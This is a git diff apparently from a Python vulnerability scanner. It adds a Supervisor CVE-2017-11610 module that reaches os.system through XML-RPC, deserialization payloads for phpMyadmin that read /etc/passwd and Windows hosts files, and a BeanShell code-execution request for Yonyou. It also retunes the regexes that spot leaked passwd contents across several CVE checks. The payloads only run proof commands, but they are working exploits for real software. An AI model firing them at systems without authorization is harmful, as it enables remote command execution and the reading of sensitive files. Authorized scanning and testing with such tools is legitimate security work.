self.proxies = config.get('proxies')
- self.app_name = 'mini_httpd'
+ self.app_name = 'MiniHttpd'
self.md = md5(self.app_name)
self.cmd = 'echo ' + self.md
@@ -80,9 +81,7 @@ def cve_2018_18778_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- ):
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/NodeRED.py b/payloads/NodeRED.py
index 9623a50..13fe77a 100644
--- a/payloads/NodeRED.py
+++ b/payloads/NodeRED.py
@@ -20,6 +20,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class NodeRED():
def __init__(self):
@@ -94,10 +95,9 @@ def cve_2021_3223_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
or ('To password protect the Node-RED editor and admin API' in res.text)
):
results = {
@@ -107,7 +107,8 @@ def cve_2021_3223_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/Nodejs.py b/payloads/Nodejs.py
index bd301bb..92550bd 100644
--- a/payloads/Nodejs.py
+++ b/payloads/Nodejs.py
@@ -24,6 +24,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class Nodejs():
def __init__(self):
@@ -125,15 +126,14 @@ def cve_2017_14849_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/RubyOnRails.py b/payloads/RubyOnRails.py
index d85a93c..47ea74a 100644
--- a/payloads/RubyOnRails.py
+++ b/payloads/RubyOnRails.py
@@ -175,10 +175,9 @@ def cve_2018_3760_scan(self, url):
)
logger.logging(vul_info, res2.status_code, res2) # * LOG
- if (('/sbin/nologin' in res2.text)
- or ('root:x:0:0:root' in res2.text)
- or ('Microsoft Corp' in res2.text)
- or ('Microsoft TCP/IP for Windows' in res2.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res2.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res2.text)
+ and ('Microsoft TCP/IP for Windows' in res2.text))
):
results = {
'Target': target,
@@ -241,10 +240,9 @@ def cve_2019_5418_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 4ad33f3..f28a9e5 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -49,6 +49,7 @@
from thirdparty import requests
# from thirdparty import HackRequests
from time import sleep
+import re
class Spring():
def __init__(self):
@@ -342,10 +343,9 @@ def cve_2021_21234_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
@@ -354,7 +354,8 @@ def cve_2021_21234_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
@@ -401,10 +402,9 @@ def cve_2020_5410_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
@@ -413,7 +413,8 @@ def cve_2020_5410_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/Supervisor.py b/payloads/Supervisor.py
new file mode 100644
index 0000000..2a08283
--- /dev/null
+++ b/payloads/Supervisor.py
@@ -0,0 +1,134 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Supervisor是用Python开发的一套通用的进程管理程序, 能将一个普通的命令行进程变为后台daemon, 并监控进程状态, 异常退出时能自动重启;
+是Linux/Unix系统下的一个进程管理工具, 不支持Windows系统;
+ Supervisor扫描类:
+ 1. Supervisord 远程命令执行
+ CVE-2017-11610
+ Payload: https://vulhub.org/#/environments/supervisor/CVE-2017-11610/
+
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Supervisor():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Supervisor'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.random_num_1, self.random_num_2 = random_int_2(5)
+
+ self.cve_2017_11610_payloads = [
+ {
+ 'path': 'RPC2',
+ 'data': '''
+
+supervisor.supervisord.options.warnings.linecache.os.system
+
+
+expr {} + {} | tee -a /tmp/supervisord.log
+
+
+'''.format(self.random_num_1, self.random_num_2)
+ },
+ {
+ 'path': 'RPC2',
+ 'data': '''
+
+supervisor.readLog
+
+
+0
+
+
+0
+
+
+'''
+ },
+ ]
+
+ def cve_2017_11610_scan(self, url):
+ ''' Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)
+ 通过POST请求向Supervisord管理界面提交恶意数据, 可以获取服务器操作权限, 带来严重的安全风险
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2017-11610'
+ # vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {
+ 'Content-Type': 'text/xml'
+ }
+
+ headers = self.headers.copy()
+ headers.update(vul_info['headers'])
+
+ res_list = []
+
+ for payload in self.cve_2017_11610_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ res_list.append(res)
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (str(self.random_num_1 + self.random_num_2) in res.text):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request-1': res_list[0],
+ 'Request-2': res_list[1]
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2017_11610_scan, url=url)
+ ]
+
+supervisor = Supervisor()
diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py
index 1f70455..8dd4b13 100644
--- a/payloads/ThinkPHP.py
+++ b/payloads/ThinkPHP.py
@@ -35,6 +35,7 @@
from lib.tool import head
from thirdparty import requests
from time import sleep
+import re
class ThinkPHP():
def __init__(self):
@@ -104,7 +105,7 @@ def __init__(self):
}
]
- # * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ
+ # * 以下payload没有找到测试环境, 暂时没写poc
self.thinkphp_5_options_sqlinject_payloads = [
{
'path': 'index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 **',
@@ -194,7 +195,8 @@ def cnvd_2018_24942_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
@@ -244,7 +246,7 @@ def cnnvd_201901_445_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
@@ -300,7 +302,8 @@ def thinkphp_2_x_rce_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
@@ -400,7 +403,7 @@ def cve_2018_1002015_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('root:x:0:0:root' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
or (self.md in check.check_res(res.text, self.md))
or (('PHP Version' in res.text)
and ('PHP License' in res.text))
@@ -408,7 +411,7 @@ def cve_2018_1002015_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/Weblogic.py b/payloads/Weblogic.py
index 34d0eee..e8dde12 100644
--- a/payloads/Weblogic.py
+++ b/payloads/Weblogic.py
@@ -209,7 +209,8 @@ def cve_2020_14882_scan(self, url):
'Url': url,
'Path': path,
'Headers': vul_info['headers']
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/Webmin.py b/payloads/Webmin.py
index ad1966f..b46ebc9 100644
--- a/payloads/Webmin.py
+++ b/payloads/Webmin.py
@@ -111,7 +111,7 @@ def cve_2019_15107_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
@@ -163,7 +163,7 @@ def cve_2019_15642_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/Yonyou.py b/payloads/Yonyou.py
index e016143..dc75c89 100644
--- a/payloads/Yonyou.py
+++ b/payloads/Yonyou.py
@@ -26,7 +26,7 @@
from lib.api.dns import dns
from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5
+from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
@@ -42,10 +42,12 @@ def __init__(self):
self.app_name = 'Yonyou'
+ self.random_num_1, self.random_num_2 = random_int_2()
+
self.cnvd_2021_30167_payloads = [
{
'path': 'servlet/~ic/bsh.servlet.BshServlet',
- 'data': ''
+ 'data': 'bsh.script=print%28{}*{}%29%3B'.format(self.random_num_1, self.random_num_2)
}
]
@@ -113,7 +115,7 @@ def cnvd_2021_30167_scan(self, url):
vul_info['target'] = target
try:
- res = requests.get(
+ res = requests.post(
target,
timeout=self.timeout,
headers=headers,
@@ -132,7 +134,7 @@ def cnvd_2021_30167_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ('BeanShell' in res.text):
+ if (str(self.random_num_1 * self.random_num_2) in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -140,7 +142,8 @@ def cnvd_2021_30167_scan(self, url):
'Payload': {
'Url': url,
'Path': path
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/demo.py b/payloads/demo/demo.py
similarity index 100%
rename from payloads/demo.py
rename to payloads/demo/demo.py
diff --git a/payloads/demo2.py b/payloads/demo/demo2.py
similarity index 100%
rename from payloads/demo2.py
rename to payloads/demo/demo2.py
diff --git a/payloads/demo3.py b/payloads/demo/demo3.py
similarity index 100%
rename from payloads/demo3.py
rename to payloads/demo/demo3.py
diff --git a/payloads/phpMyadmin.py b/payloads/phpMyadmin.py
index aa52e69..ffcbc3d 100644
--- a/payloads/phpMyadmin.py
+++ b/payloads/phpMyadmin.py
@@ -25,6 +25,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class phpMyadmin():
def __init__(self):
@@ -52,6 +53,18 @@ def __init__(self):
]
self.wooyun_2016_199433_payloads = [
+ {
+ 'path': 'scripts/setup.php',
+ 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
+ },
+ {
+ 'path': 'scripts/setup.php',
+ 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}'
+ },
+ {
+ 'path': 'scripts/setup.php',
+ 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}'
+ },
{
'path': 'setup.php',
'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
@@ -107,10 +120,9 @@ def cve_2018_12613_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
@@ -161,10 +173,9 @@ def wooyun_2016_199433_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
diff --git a/thirdparty/HackRequests/HackRequests.py b/thirdparty/HackRequests/HackRequests.py
index 2191a66..8661c97 100644
--- a/thirdparty/HackRequests/HackRequests.py
+++ b/thirdparty/HackRequests/HackRequests.py
@@ -201,7 +201,9 @@ def httpraw(self, raw: str, **kwargs):
v = ""
headers[k] = v
index += 1
- headers["Connection"] = "close"
+ if not headers["Connection"]:
+ headers["Connection"] = "close"
+
if len(raws) < index + 1:
body = ''
else:
@@ -237,7 +239,11 @@ def httpraw(self, raw: str, **kwargs):
except KeyboardInterrupt:
raise HackError("user exit")
finally:
- conn.close()
+ try:
+ rep.read_copy = rep.read() # * 2022-11-06 Clincat, copy rep.read()
+ conn.close()
+ except:
+ pass
log["response"] = "HTTP/%.1f %d %s" % (
rep.version * 0.1, rep.status,
rep.reason) + '\r\n' + str(rep.msg)
@@ -316,7 +322,11 @@ def http(self, url, **kwargs):
except KeyboardInterrupt:
raise HackError("user exit")
finally:
- conn.close()
+ try:
+ rep.read_copy = rep.read() # * 2022-11-06 Clincat, copy rep.read()
+ conn.close()
+ except:
+ pass
if post:
log["request"] += "\r\n\r\n" + post
@@ -381,7 +391,8 @@ def content(self):
return self._content
encode = self.rep.msg.get('content-encoding', None)
try:
- body = self.rep.read()
+ # body = self.rep.read()
+ body = self.rep.read_copy # * 2022-11-06 Clincat, use read_copy
except socket.timeout:
body = b''
if encode == 'gzip':
diff --git a/vulcat.py b/vulcat.py
index c72fc54..09b4d13 100644
--- a/vulcat.py
+++ b/vulcat.py
@@ -28,5 +28,5 @@
except KeyboardInterrupt:
print(color.reset('CTRL + C exit the scan'))
os._exit(0)
-except Exception as e:
- print(e)
\ No newline at end of file
+# except Exception as e:
+# print(e)
\ No newline at end of file